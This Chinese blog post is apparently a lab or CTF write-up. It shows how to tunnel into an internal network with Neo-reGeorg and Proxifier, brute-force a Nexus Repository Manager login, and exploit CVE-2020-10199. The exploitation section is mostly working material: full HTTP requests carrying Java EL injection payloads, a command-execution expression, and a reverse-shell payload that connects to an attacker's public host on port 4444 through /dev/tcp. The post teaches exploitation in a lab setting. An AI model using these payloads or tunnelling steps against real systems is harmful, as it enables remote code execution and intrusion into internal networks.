内网渗透实战+Nexus(CVE-2020-10199)

最新推荐文章于 2024-06-02 10:20:23 发布
最新推荐文章于 2024-06-02 10:20:23 发布
阅读量717 收藏
点赞数
分类专栏: WEB刷题记录 WEB 内网渗透 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanxu8877/article/details/127955777
版权

文章目录

Nexus(CVE-2020-10199)

本题知识点

  • 内网渗透连接方法
  • Nexus
  • 注意事项:本漏洞必须保证首先在上传一个jar包

内网渗透方法

neo-reGeorg+Proxifier代理内网渗透工具

neo-reGeorg

首先下载neo-reGeorg,下载地址
https://github.com/L-codes/Neo-reGeorg

下载后有如下文件,操作简单,只需要两步

  • 1.在本地设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器(靶机)
python neoreg.py generate -k admin

其中admin是密码,可以随便设置,成功后返回结果如下

可一看到在文件夹中多出了一个文件夹neoreg_servers。

打开后发现相关脚本,服务器是什么语言上传想用语言的脚本。

在这里,我这里是php的语言,在第一步getshell之后直接在仪剑中上传tunnel.php,

  • 上传完成后在本地实行监听,使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理
python3 neoreg.py -k admin -u http://xx/tunnel.php

其中admin为刚才我们设置的密码,如果连接成功,返回如下:

没有ERROR,只有一个闪光标,可以看到socks5 server端口为1080,接下来我们需要配置Proxifier。

proxifiter for mac配置


首先点击添加代理,刚才我们看到端口为1080


点击rules,创建规则,如下

其中Default选择Direct,新建一个socts,代理为刚才的127.0.0.1:1080,最主要的是Target Hosts,这里可以填写我们需要代理的地址,如本题,我们在上个题目中发现为192.168.144.*

所以秩序将Target Hosts改为192.168.144.0-192.168.144.255即可,添加完成后直接用Google访问192.168.144.3:8081即可。
登录后直接登录,爆破



爆破出密码admin123,进行登录


将必填项填写后,点击upload。

Nexus漏洞验证

注释:此处的漏洞验证应用到了vulfocus中的靶场,不过特别不好用,在这里打了一会后用本机再次搭建的。
发送验证数据包

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 123.58.224.8:63778
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.9425898541928359
Content-Type: application/json
Accept: */*
Origin: http://123.58.224.8:63778
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://123.58.224.8:63778/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.9425898541928359; NXSESSIONID=74764ce0-fcbf-4edd-bf2c-878657b42c29
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{233*233*233}"]
  }
}

上面需要修改三个地方,Host: 123.58.224.8:63778Origin: http://123.58.224.8:63778Referer: http://123.58.224.8:63778/ 修改为自己的ip。

NX-ANTI-CSRF-TOKEN=0.9425898541928359; NXSESSIONID=74764ce0-fcbf-4edd-bf2c-878657b42c29修改为自己登录后的TOKEN和NXSESSIONID,注意还有上面有一个NX-ANTI-CSRF-TOKEN: 0.9425898541928359需要修改。
修改完后,直接发送上述数据包,如图。

可以看到233233233被计算出来了,漏洞存在。
使用表达式$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}即可成功执行任意命令。

如图,命令执行成功。

反弹shell

此处的payload为本地搭建的环境。

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 331
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.35495162173217687
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.35495162173217687; NXSESSIONID=335df1ae-9085-41d1-87c7-033ef20fe5d5
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/公网ip/4444<&1')}"]
  }
}

也是和上面一样,需要修改三个地方,Host: 127.0.0.1:8081Origin: http://127.0.0.1:8081Referer: http://127.0.0.1:8081/ 修改为自己靶机的ip端口。

NX-ANTI-CSRF-TOKEN=0.35495162173217687;NXSESSIONID=335df1ae-9085-41d1-87c7-033ef20fe5d5修改为自己登录后的TOKEN和NXSESSIONID,注意还有上面有一个NX-ANTI-CSRF-TOKEN: 0.35495162173217687需要修改。
最后公网ip是自己的云服务器地址,在公网ip(云服务器)上用nc执行监控4444端口

如图,表示反弹shell成功。在公网ip上用nc执行监控4444端口

我们在公网服务器上可以看到执行命令成功。

sean7777777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1647
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
Neo-reGeorg 测试
prettyX的博客
10-06 626
今天来学习、测试一下Neo-reGeorg Neo-reGeorg下载地址:https://github.com/L-codes/Neo-reGeorg 使用 1、设置密码并生成隧道文件,默认生成到当前路径的neoreg_server目录下: //kali python3 neoreg.py generate -k test123 2、将生成的脚本,这里使用的是tunnel.php,放到模拟环境的双网卡的Web目录下 使用neoreg.py连接Web服务器,在本地建...
流量代理之reGeorg内网穿透工具包.zip
01-13
reGeorg介绍 reGeorg 的前身是2008年 SensePost 在 BlackHat USA 2008 的 reDuh 延伸与扩展。 reGeorg是reDuh的继承者,利用了会话层的socks5协议,相比较于reDuh效率更高一些。 关于通过reGeorg建立HTTP隧道的作用体现在,当我们能通过外网访问服务器A,但是我们并不能与位于内网的主机交互,这时reGeorg就派上了用场,假设此时我们拿到了服务器A的webshell,但是该内网主机的icmp、DNS、tcp和udp协议等都不能出网,唯一的数据通道是webshell搭建正向代理。 所以在公网能访问的服务器A上安装reGeorg,它就在攻击者与内网主机之间充当一个转发的角色,从而达到攻击者与内网的信息交互。
vulhub中Nexus Repository Manager 3 未授权目录穿越漏洞(CVE-2024-4956)
最新发布
yougexiaojiuguan的博客
06-02 423
漏洞复现过程的记录
nexus 远程代码执行 (CVE-2020-10199
m0_60716947的博客
12-20 1089
nexus 远程代码执行 (CVE-2020-10199
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199
ch258563的博客
06-06 1584
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-1938.zip
04-15
CVE-2020-1938:Apache Tomcat AJP协议远程代码执行漏洞】 CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞,该漏洞允许攻击者通过AJP(Apache JServ Protocol)接口来实现远程代码执行,从而对目标系统...
NEXUS CVE-2020-10199漏洞复现
MDSEC的博客
08-16 178
漏洞名称Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)漏洞简述​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199
序列化反射filter添加Neo-reGeorg内网代理
GalaxySpaceX的博客
10-08 365
序列化反射filter添加Neo-reGeorg内网代理
【工具使用】reGeorg+Proxifier实现内网穿透
做自己喜欢的事,并将其发挥到极致!
01-13 7599
文章目录前言一、工具介绍二、正向代理和反向代理三、工具下载和配置四、reGeorg使用方法五、应用场景六、reGeorg+proxychains代理Linux内网 前言 在内网环境中,使用一些常规的内网反弹工具均被各大安全软件所拦截,尝试提权但无果,这时就需要一款内网代理和端口转发工具,穿越防火墙直连内网。 本文皆在学习内网渗透中 reGeorg+Proxifier 工具的使用。 一、工具介绍 reGeorg是reDuh的继承者,利用了会话层的socks5协议,而Proxifier是一款强大的sock.
CVE-2020-10199: Nexus Repository Manager代码执行通告
爱国小白帽
04-02 1411
CVE-2020-10199: Nexus Repository Manager代码执行通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x 的远程代码执行漏洞通告。在...
Neo-reGeorg:智能安全扫描与渗透测试工具
gitblog_00029的博客
03-23 337
Neo-reGeorg:智能安全扫描与渗透测试工具 项目地址:https://gitcode.com/L-codes/Neo-reGeorg Neo-reGeorg 是一个基于 Python 的动态二进制分析框架,专为安全研究人员和逆向工程师设计,用于辅助进行智能安全扫描和渗透测试。该项目继承了原始 reGeorg 工具的优点,并进行了现代化改造,引入了一系列新特性以提高效率和实用性。 技术分析 ...
内网渗透-代理(reGeorg
weixin_33712987的博客
12-25 339
我对于reGeorg的使用,只是简单说下。 首先需要下载reGeorg,下载地址:https://github.com/sensepost/reGeorg 然后将reGeorg,上传到服务端。直接访问上传的reGeorg文件,提示“Georg says, 'All seems fine'”,则为正常(PHP版本的服务端,一直没有使用成功过)。 最后用在PC端使用命令行,运行py程序:pyth...
reGeorg远程连接内网服务器
qq_40096118的博客
04-10 547
reGeorg搭建http代理
CVE-2020-10199
05-25
CVE-2020-10199是一个影响Spring Cloud Config的安全漏洞。攻击者可以通过在Spring Cloud Config Server中恶意配置文件路径上的反向路径遍历漏洞来读取应用程序上的任何文件。该漏洞已被修复。建议受影响的用户及时更新其Spring Cloud Config Server版本到已发布的安全版本,以避免被攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值